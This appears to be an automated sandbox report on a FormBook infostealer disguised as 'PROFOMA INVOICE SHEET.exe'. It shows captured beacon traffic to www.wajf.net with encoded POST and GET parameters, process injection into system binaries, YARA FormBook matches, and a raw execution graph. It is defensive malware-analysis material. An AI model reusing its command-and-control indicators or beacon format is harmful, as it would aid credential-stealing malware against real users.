                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  39 | 192.168.2.4 | 55848 | 54.81.206.248 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:32:58.642357111 CEST | 10861 | OUT | POST /zl4r/ HTTP/1.1
                                  Host: www.wajf.net
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.wajf.net
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 10302
                                  Referer: http://www.wajf.net/zl4r/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 6e 43 61 54 77 75 7a 66 63 54 2b 31 35 7a 51 41 61 63 4e 4c 61 74 64 6b 35 64 4c 32 7a 71 6f 59 4b 44 61 63 56 6e 6f 5a 76 76 72 75 44 68 36 56 55 79 7a 65 6a 4f 68 74 51 46 4a 57 56 30 34 6b 48 70 49 42 4e 6c 67 65 4a 61 7a 79 77 7a 4d 62 42 47 6f 53 52 48 53 45 51 62 41 59 55 6f 44 37 4f 4e 6c 71 4a 6d 4d 2f 79 6a 34 6a 33 57 74 68 44 58 67 34 44 42 50 4f 41 41 64 30 57 6d 6a 32 57 78 44 63 38 44 48 6a 57 52 4c 76 69 47 51 78 71 77 57 7a 41 46 6e 6f 4a 6c 39 4f 74 48 76 43 61 45 64 78 65 41 78 32 34 47 6a 41 77 58 2f 2f 75 4b 32 75 61 34 4d 69 56 7a 73 61 5a 59 6e 6c 69 4d 41 64 68 68 6a 5a 44 59 2f 45 5a 44 5a 37 6f 4b 72 4f 4b 71 51 6c 51 58 4e 53 67 2f 69 30 57 59 6d 53 43 6a 5a 67 55 76 43 36 4b 47 65 46 6c 63 45 52 62 47 4f 49 43 57 46 43 62 61 52 68 57 6d 6e 4a 50 49 56 35 34 6c 4b 65 78 72 54 61 61 65 53 6e 31 37 63 43 38 79 6f 43 4d 45 71 61 35 6f 79 4e 79 50 75 72 59 4c 39 34 5a 54 50 76 75 45 71 59 4d 68 39 4c 45 6f 48 37 4c 53 4e 2b 59 45 52 30 44 72 34 66 6f 71 35 74 [TRUNCATED]
                                  Data Ascii: h2Pt9=[TRUNCATED]
                                  Sep 16, 2024 09:32:59.102894068 CEST | 1236 | IN | HTTP/1.1 200 OK
                                  Date: Mon, 16 Sep 2024 07:32:59 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Data Raw: 33 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                  Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                  Sep 16, 2024 09:32:59.102920055 CEST1236INData Raw: 74 3a 20 34 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 37 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20
                                  Data Ascii: t: 40vw; max-height: 700px; min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex;
                                  Sep 16, 2024 09:32:59.102931023 CEST1236INData Raw: 69 74 65 63 64 6e 2e 63 6f 6d 2f 6e 62 2f 63 64 6c 2f 63 6f 6d 69 6e 67 2d 73 6f 6f 6e 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6f 6d 6d 69 6e 67 20 73 6f 6f 6e 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                  Data Ascii: itecdn.com/nb/cdl/coming-soon.png" alt="comming soon" /> <div class="main"> <h1>wajf.net is coming soon</h1> </div> <div>This domain is managed at <br> <a href="/
                                  Sep 16, 2024 09:32:59.102947950 CEST1236INData Raw: 2d 37 2e 36 36 30 35 39 2d 34 2e 30 33 38 2d 31 34 2e 37 36 34 2d 31 37 2e 31 33 34 36 34 2d 31 34 2e 37 36 34 48 33 37 38 2e 35 37 30 32 35 76 33 30 2e 36 34 36 37 34 63 33 2e 33 34 34 36 33 2c 30 2c 38 2e 34 39 36 36 36 2e 32 37 39 32 35 2c 31
                                  Data Ascii: -7.66059-4.038-14.764-17.13464-14.764H378.57025v30.64674c3.34463,0,8.49666.27925,11.42241.27925,17.82941,0,23.40032-4.59656,23.40032-14.34851Zm62.4236-33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H
                                  Sep 16, 2024 09:32:59.102960110 CEST1236INData Raw: 35 33 2d 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 35 32 36 63 30 2d 32 31 2e 37 33 31 31 39 2c 31 30 2e 38 36 35 36 2d 33 34 2e 39 36 34 2c 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 34 41 31 31 38 2e 38 30 37 37 39 2c 31
                                  Data Ascii: 53-33.29627-34.96235V105.526c0-21.73119,10.8656-34.964,33.29627-34.964A118.80779,118.80779,0,0,1,581.4102,74.1828c3.20332.83607,3.76519,1.67248,3.76519,3.76216V149.8214C585.17539,169.60389,575.14452,177.95924,553.83389,177.95924ZM566.7858,86.8
                                  Sep 16, 2024 09:32:59.102971077 CEST1236INData Raw: 2e 39 39 30 32 63 30 2c 35 2e 35 37 35 36 32 2c 32 2e 35 30 36 38 38 2c 36 2e 35 34 38 32 39 2c 38 2e 34 39 33 33 2c 36 2e 35 34 38 32 39 48 37 31 33 2e 38 34 34 63 31 2e 38 31 33 34 35 2c 30 2c 32 2e 39 32 34 30 37 2e 36 39 36 34 35 2c 32 2e 39
                                  Data Ascii: .9902c0,5.57562,2.50688,6.54829,8.4933,6.54829H713.844c1.81345,0,2.92407.69645,2.92407,2.08968v8.63763C716.76805,148.9833,715.93366,149.8214,714.11987,150.10066Z" class="cls-1"></path><path d="M523.55018,5.59211l4.971,2.86822a1.29783,1.29783,0
                                  Sep 16, 2024 09:32:59.102982998 CEST1236INData Raw: 2d 31 2e 37 36 31 2e 34 32 33 39 32 4c 34 35 33 2e 34 31 38 35 35 2c 33 30 2e 34 30 38 35 33 61 31 2e 32 35 34 32 33 2c 31 2e 32 35 34 32 33 2c 30 2c 30 2c 31 2d 2e 34 35 36 39 2d 31 2e 37 30 33 37 38 6c 32 2e 38 36 35 31 39 2d 34 2e 39 36 36 33
                                  Data Ascii: -1.761.42392L453.41855,30.40853a1.25423,1.25423,0,0,1-.4569-1.70378l2.86519-4.96631a1.25738,1.25738,0,0,1,1.70849-.45656l22.19448,12.81733A1.30449,1.30449,0,0,1,480.24559,37.83394Z" class="cls-2"></path><path d="M490.17148,30.00412l-4.96463,2.
                                  Sep 16, 2024 09:32:59.102994919 CEST1000INData Raw: 2e 35 38 37 34 2c 35 2e 35 38 37 34 2c 30 2c 30 2c 31 2c 37 32 2e 37 31 31 31 38 2c 31 35 30 2e 31 30 30 36 36 5a 22 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 31 35 32 2e 38 31 36 34 39 2c 31
                                  Data Ascii: .5874,5.5874,0,0,1,72.71118,150.10066Z" class="cls-2"></path><path d="M152.81649,147.59344a118.76528,118.76528,0,0,1-27.99855,3.62086c-22.42764,0-33.28988-13.23453-33.28988-34.96235V105.526c0-21.73119,10.86224-34.964,33.28988-34.964a118.86956,
                                  Sep 16, 2024 09:32:59.103007078 CEST1236INData Raw: 36 2c 32 2e 38 30 37 30 36 2c 30 2c 30 2c 31 2d 32 2e 36 34 39 38 37 2c 32 2e 39 32 37 37 38 48 31 37 32 2e 36 30 32 33 33 61 32 2e 38 30 34 31 35 2c 32 2e 38 30 34 31 35 2c 30 2c 30 2c 31 2d 32 2e 36 34 34 38 32 2d 32 2e 39 32 37 37 38 56 39 37
                                  Data Ascii: 6,2.80706,0,0,1-2.64987,2.92778H172.60233a2.80415,2.80415,0,0,1-2.64482-2.92778V97.16759c0-17.55048,10.44672-26.60565,28.13818-26.60565h3.343c7.80021,0,14.06757,1.81043,18.38655,5.57259,4.319-3.76216,10.72429-5.57259,18.52585-5.57259h3.34329c1
                                  Sep 16, 2024 09:32:59.103019953 CEST1236INData Raw: 37 34 2e 30 32 33 34 37 2c 31 34 39 2e 36 39 36 32 35 61 34 34 2e 38 36 37 34 39 2c 34 34 2e 38 36 37 34 39 2c 30 2c 30 2c 31 2d 31 30 2e 34 38 31 33 37 2c 31 2e 30 35 31 34 63 2d 31 30 2e 35 35 39 37 37 2c 30 2d 31 38 2e 35 32 37 35 31 2d 36 2e
                                  Data Ascii: 74.02347,149.69625a44.86749,44.86749,0,0,1-10.48137,1.0514c-10.55977,0-18.52751-6.49547-18.52751-19.73976v-7.557c0-13.24462,7.96774-19.74683,18.52751-19.74683a44.5792,44.5792,0,0,1,10.48137,1.05814c1.37978.32534,1.70512.81151,1.70512,2.11256v5
                                  Sep 16, 2024 09:32:59.103074074 CEST657INData Raw: 31 2e 36 33 32 39 31 2c 30 2c 30 2c 31 2d 31 2e 35 34 30 39 34 2c 31 2e 37 31 31 38 35 68 2d 37 2e 37 31 37 37 38 61 31 2e 36 33 33 35 37 2c 31 2e 36 33 33 35 37 2c 30 2c 30 2c 31 2d 31 2e 35 34 34 33 2d 31 2e 37 31 31 38 35 56 31 31 39 2e 32 32
                                  Data Ascii: 1.63291,0,0,1-1.54094,1.71185h-7.71778a1.63357,1.63357,0,0,1-1.5443-1.71185V119.22548c0-3.97884-.65069-6.58127-5.362-6.58127h-1.9551c-3.73256,0-5.68429,1.05477-5.68429,6.58127v29.16333a1.636,1.636,0,0,1-1.54733,1.71185H827.2866a1.63824,1.63824


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  40 | 192.168.2.4 | 55849 | 54.81.206.248 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:33:01.185905933 CEST | 506 | OUT | GET /zl4r/?h2Pt9=qAyzze+7Xxv+wA09CtJQAc1N08fgxsYjMF3PXk0d3f7QX0q4Jz2C7sJqIlEgcTB+GqBDI184c5mD0TMdCmIzOUWEYKg5UaPGXuwVBW400SE67lweB1cXDRo=&4RLhs=7BJLM4eH HTTP/1.1
                                  Host: www.wajf.net
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Connection: close
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Sep 16, 2024 09:33:01.650978088 CEST | 1236 | IN | HTTP/1.1 200 OK
                                  Date: Mon, 16 Sep 2024 07:33:01 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Data Raw: 33 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                  Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                  Sep 16, 2024 09:33:01.650999069 CEST1236INData Raw: 74 3a 20 34 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 37 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20
                                  Data Ascii: t: 40vw; max-height: 700px; min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex;
                                  Sep 16, 2024 09:33:01.651010036 CEST1236INData Raw: 69 74 65 63 64 6e 2e 63 6f 6d 2f 6e 62 2f 63 64 6c 2f 63 6f 6d 69 6e 67 2d 73 6f 6f 6e 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6f 6d 6d 69 6e 67 20 73 6f 6f 6e 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                  Data Ascii: itecdn.com/nb/cdl/coming-soon.png" alt="comming soon" /> <div class="main"> <h1>wajf.net is coming soon</h1> </div> <div>This domain is managed at <br> <a href="/
                                  Sep 16, 2024 09:33:01.651021957 CEST1236INData Raw: 2d 37 2e 36 36 30 35 39 2d 34 2e 30 33 38 2d 31 34 2e 37 36 34 2d 31 37 2e 31 33 34 36 34 2d 31 34 2e 37 36 34 48 33 37 38 2e 35 37 30 32 35 76 33 30 2e 36 34 36 37 34 63 33 2e 33 34 34 36 33 2c 30 2c 38 2e 34 39 36 36 36 2e 32 37 39 32 35 2c 31
                                  Data Ascii: -7.66059-4.038-14.764-17.13464-14.764H378.57025v30.64674c3.34463,0,8.49666.27925,11.42241.27925,17.82941,0,23.40032-4.59656,23.40032-14.34851Zm62.4236-33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H
                                  Sep 16, 2024 09:33:01.651032925 CEST1236INData Raw: 35 33 2d 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 35 32 36 63 30 2d 32 31 2e 37 33 31 31 39 2c 31 30 2e 38 36 35 36 2d 33 34 2e 39 36 34 2c 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 34 41 31 31 38 2e 38 30 37 37 39 2c 31
                                  Data Ascii: 53-33.29627-34.96235V105.526c0-21.73119,10.8656-34.964,33.29627-34.964A118.80779,118.80779,0,0,1,581.4102,74.1828c3.20332.83607,3.76519,1.67248,3.76519,3.76216V149.8214C585.17539,169.60389,575.14452,177.95924,553.83389,177.95924ZM566.7858,86.8
                                  Sep 16, 2024 09:33:01.651045084 CEST1236INData Raw: 2e 39 39 30 32 63 30 2c 35 2e 35 37 35 36 32 2c 32 2e 35 30 36 38 38 2c 36 2e 35 34 38 32 39 2c 38 2e 34 39 33 33 2c 36 2e 35 34 38 32 39 48 37 31 33 2e 38 34 34 63 31 2e 38 31 33 34 35 2c 30 2c 32 2e 39 32 34 30 37 2e 36 39 36 34 35 2c 32 2e 39
                                  Data Ascii: .9902c0,5.57562,2.50688,6.54829,8.4933,6.54829H713.844c1.81345,0,2.92407.69645,2.92407,2.08968v8.63763C716.76805,148.9833,715.93366,149.8214,714.11987,150.10066Z" class="cls-1"></path><path d="M523.55018,5.59211l4.971,2.86822a1.29783,1.29783,0

                                  Target ID:0
                                  Start time:03:28:58
                                  Start date:16/09/2024
                                  Path:C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe"
                                  Imagebase:0x300000
                                  File size:1'722'368 bytes
                                  MD5 hash:BC8D560138E7AC511F70880FC394AD2D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Target ID:1
                                  Start time:03:28:59
                                  Start date:16/09/2024
                                  Path:C:\Windows\SysWOW64\svchost.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe"
                                  Imagebase:0xed0000
                                  File size:46'504 bytes
                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2117687090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2117687090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2118026660.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2118026660.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2118406683.0000000005600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2118406683.0000000005600000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:true

                                  Target ID:5
                                  Start time:03:29:33
                                  Start date:16/09/2024
                                  Path:C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe"
                                  Imagebase:0x6d0000
                                  File size:140'800 bytes
                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4150549424.00000000039C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4150549424.00000000039C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:false

                                  Target ID:6
                                  Start time:03:29:34
                                  Start date:16/09/2024
                                  Path:C:\Windows\SysWOW64\TapiUnattend.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\SysWOW64\TapiUnattend.exe"
                                  Imagebase:0x820000
                                  File size:12'800 bytes
                                  MD5 hash:D5BFFD755F566AAACB57CF83FDAA5CD0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4149796746.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4149796746.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4149856590.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4149856590.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4149551530.00000000028E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4149551530.00000000028E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                  Reputation:moderate
                                  Has exited:false

                                  Target ID:7
                                  Start time:03:29:50
                                  Start date:16/09/2024
                                  Path:C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe"
                                  Imagebase:0x6d0000
                                  File size:140'800 bytes
                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4150699714.0000000002570000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4150699714.0000000002570000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:false

                                  Target ID:8
                                  Start time:03:30:02
                                  Start date:16/09/2024
                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                  Imagebase:0x7ff6bf500000
                                  File size:676'768 bytes
                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true


                                    Execution Graph

                                    Execution Coverage:2.8%
                                    Dynamic/Decrypted Code Coverage:1.1%
                                    Signature Coverage:5.3%
                                    Total number of Nodes:1649
                                    Total number of Limit Nodes:45
EnterCriticalSection 95843->95853 95845 33859f 95846 3385d1 95845->95846 95847 3385c6 95845->95847 95869 32f2d9 20 API calls _abort 95846->95869 95854 3386ae 95847->95854 95850 3385cc 95870 3385fb LeaveCriticalSection __wsopen_s 95850->95870 95852 3385ee __fread_nolock 95852->95836 95853->95845 95871 3353c4 95854->95871 95856 3386c4 95884 335333 21 API calls 3 library calls 95856->95884 95857 3386be 95857->95856 95859 3386f6 95857->95859 95860 3353c4 __wsopen_s 26 API calls 95857->95860 95859->95856 95861 3353c4 __wsopen_s 26 API calls 95859->95861 95863 3386ed 95860->95863 95864 338702 CloseHandle 95861->95864 95862 33871c 95865 33873e 95862->95865 95885 32f2a3 20 API calls 2 library calls 95862->95885 95866 3353c4 __wsopen_s 26 API calls 95863->95866 95864->95856 95867 33870e GetLastError 95864->95867 95865->95850 95866->95859 95867->95856 95869->95850 95870->95852 95872 3353d1 95871->95872 95873 3353e6 95871->95873 95886 32f2c6 20 API calls _abort 95872->95886 95877 33540b 95873->95877 95888 32f2c6 20 API calls _abort 95873->95888 95876 3353d6 95887 32f2d9 20 API calls _abort 95876->95887 95877->95857 95878 335416 95889 32f2d9 20 API calls _abort 95878->95889 95881 3353de 95881->95857 95882 33541e 95890 3327ec 26 API calls _abort 95882->95890 95884->95862 95885->95865 95886->95876 95887->95881 95888->95878 95889->95882 95890->95881 95891 301098 95896 3042de 95891->95896 95895 3010a7 95897 30a961 22 API calls 95896->95897 95898 3042f5 GetVersionExW 95897->95898 95899 306b57 22 API calls 95898->95899 95900 304342 95899->95900 95901 3093b2 22 API calls 95900->95901 95905 304378 95900->95905 95902 30436c 95901->95902 95904 3037a0 22 API calls 95902->95904 95903 30441b GetCurrentProcess IsWow64Process 95906 304437 95903->95906 95904->95905 95905->95903 95907 3437df 95905->95907 95908 343824 GetSystemInfo 95906->95908 95909 30444f LoadLibraryA 95906->95909 95910 304460 GetProcAddress 95909->95910 95911 30449c GetSystemInfo 95909->95911 95910->95911 95912 304470 
GetNativeSystemInfo 95910->95912 95913 304476 95911->95913 95912->95913 95914 30109d 95913->95914 95915 30447a FreeLibrary 95913->95915 95916 3200a3 29 API calls __onexit 95914->95916 95915->95914 95916->95895 95917 3203fb 95918 320407 CallCatchBlock 95917->95918 95946 31feb1 95918->95946 95920 32040e 95921 320561 95920->95921 95924 320438 95920->95924 95973 32083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 95921->95973 95923 320568 95974 324e52 28 API calls _abort 95923->95974 95935 320477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 95924->95935 95957 33247d 95924->95957 95926 32056e 95975 324e04 28 API calls _abort 95926->95975 95930 320576 95931 320457 95933 3204d8 95965 320959 95933->95965 95935->95933 95969 324e1a 38 API calls 2 library calls 95935->95969 95937 3204de 95938 3204f3 95937->95938 95970 320992 GetModuleHandleW 95938->95970 95940 3204fa 95940->95923 95941 3204fe 95940->95941 95942 320507 95941->95942 95971 324df5 28 API calls _abort 95941->95971 95972 320040 13 API calls 2 library calls 95942->95972 95945 32050f 95945->95931 95947 31feba 95946->95947 95976 320698 IsProcessorFeaturePresent 95947->95976 95949 31fec6 95977 322c94 10 API calls 3 library calls 95949->95977 95951 31fecb 95952 31fecf 95951->95952 95978 332317 95951->95978 95952->95920 95955 31fee6 95955->95920 95959 332494 95957->95959 95958 320a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 95960 320451 95958->95960 95959->95958 95960->95931 95961 332421 95960->95961 95962 332450 95961->95962 95963 320a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 95962->95963 95964 332479 95963->95964 95964->95935 96037 322340 95965->96037 95968 32097f 95968->95937 95969->95933 95970->95940 95971->95942 95972->95945 95973->95923 95974->95926 
